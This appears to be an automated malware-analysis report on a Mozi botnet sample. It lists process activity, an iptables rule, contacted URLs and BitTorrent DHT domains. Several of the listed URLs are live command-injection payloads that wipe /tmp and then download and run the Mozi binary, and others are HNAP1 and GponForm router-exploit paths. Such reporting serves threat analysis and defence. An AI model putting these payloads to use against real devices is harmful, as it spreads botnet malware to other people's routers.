iptables -I POSTROUTING -t nat -p udp --sport 18022 -j ACCEPT
clean
/sbin/upstart
n/a
clean
/bin/sh
/bin/sh -e /proc/self/fd/9
clean
/bin/sh
n/a
clean
/bin/date
date
clean
/bin/sh
n/a
clean
/usr/share/apport/apport-checkreports
/usr/bin/python3 /usr/share/apport/apport-checkreports --system
clean
/sbin/upstart
n/a
clean
/bin/sh
/bin/sh -e /proc/self/fd/9
clean
/bin/sh
n/a
clean
/bin/date
date
clean
/bin/sh
n/a
clean
/usr/share/apport/apport-gtk
/usr/bin/python3 /usr/share/apport/apport-gtk
clean
/sbin/upstart
n/a
clean
/bin/sh
/bin/sh -e /proc/self/fd/9
clean
/bin/sh
n/a
clean
/bin/date
date
clean
/bin/sh
n/a
clean
/usr/share/apport/apport-gtk
/usr/bin/python3 /usr/share/apport/apport-gtk
clean

URLs

Name
IP
Malicious
http://%s:%d/bin.sh;chmod
unknown
malicious
http://172.82.182.74:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
172.82.182.74
malicious
http://155.230.225.129:80/HNAP1/
155.230.225.129
malicious
http://134.84.133.102:80/HNAP1/
134.84.133.102
malicious
http://23.78.24.125:80/HNAP1/
23.78.24.125
malicious
http://171.247.8.159:80/HNAP1/
171.247.8.159
malicious
http://66.221.91.189:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
66.221.91.189
malicious
http://%s:%d/bin.sh
unknown
malicious
http://199.204.251.131:80/HNAP1/
199.204.251.131
malicious
http://216.164.6.45:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
216.164.6.45
malicious
http://173.222.98.151:80/HNAP1/
173.222.98.151
malicious
http://127.0.0.1:80/GponForm/diag_Form?images/
136.0.253.113
malicious
http://168.226.35.54:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
168.226.35.54
malicious
http://164.132.44.102:80/HNAP1/
164.132.44.102
malicious
http://127.0.0.1:8080/GponForm/diag_Form?images/
72.43.231.74
malicious
http://149.47.68.142:80/HNAP1/
149.47.68.142
malicious
http://182.254.240.127:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
182.254.240.127
malicious
http://38.35.98.151:80/HNAP1/
38.35.98.151
malicious
http://65.110.89.33:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
65.110.89.33
malicious
http://114.158.233.160:80/HNAP1/
114.158.233.160
malicious
http://92.122.164.134:80/HNAP1/
92.122.164.134
malicious
http://52.58.36.52:80/HNAP1/
52.58.36.52
malicious
http://pastebin.ca)
unknown
clean
http://%s:%d/Mozi.a;chmod
unknown
clean
http://127.0.0.1:7574/UD/act?1
13.230.125.57
clean
http://%s:%d/Mozi.m;$
unknown
clean
http://schemas.xmlsoap.org/soap/envelope/
unknown
clean
http://www.pastebin.ca/upload.php
unknown
clean
http://%s:%d/Mozi.m
unknown
clean
http://www.alsa-project.org/cardinfo-db/
unknown
clean
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
unknown
clean
http://www.alsa-project.org/alsa-info.sh
unknown
clean
http://%s:%d/Mozi.m;
unknown
clean
http://%s:%d/Mozi.a;sh$
unknown
clean
http://www.pastebin.ca.
unknown
clean
http://schemas.xmlsoap.org/soap/encoding/
unknown
clean
http://127.0.0.1
unknown
clean
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
unknown
clean
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
unknown
clean
http://www.alsa-project.org
unknown
clean
http://127.0.0.1sendcmd
unknown
clean
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
unknown
clean
http://ipinfo.io/ip
unknown
clean
http://%s:%d/Mozi.m;/tmp/Mozi.m
unknown
clean
http://www.pastebin.ca
unknown
clean
http://purenetworks.com/HNAP1/
unknown
clean
http://www.alsa-project.org.
unknown
clean
http://HTTP/1.1
unknown
clean
http://schemas.xmlsoap.org/soap/envelope//
unknown
clean

Domains

Name
IP
Malicious
dht.transmissionbt.com
212.129.33.59
clean
bttracker.acc.umu.se
130.239.18.159
clean
router.bittorrent.com
67.215.246.10
clean
router.utorrent.com
82.221.103.244
clean
bttracker.debian.org
unknown
clean

IPs
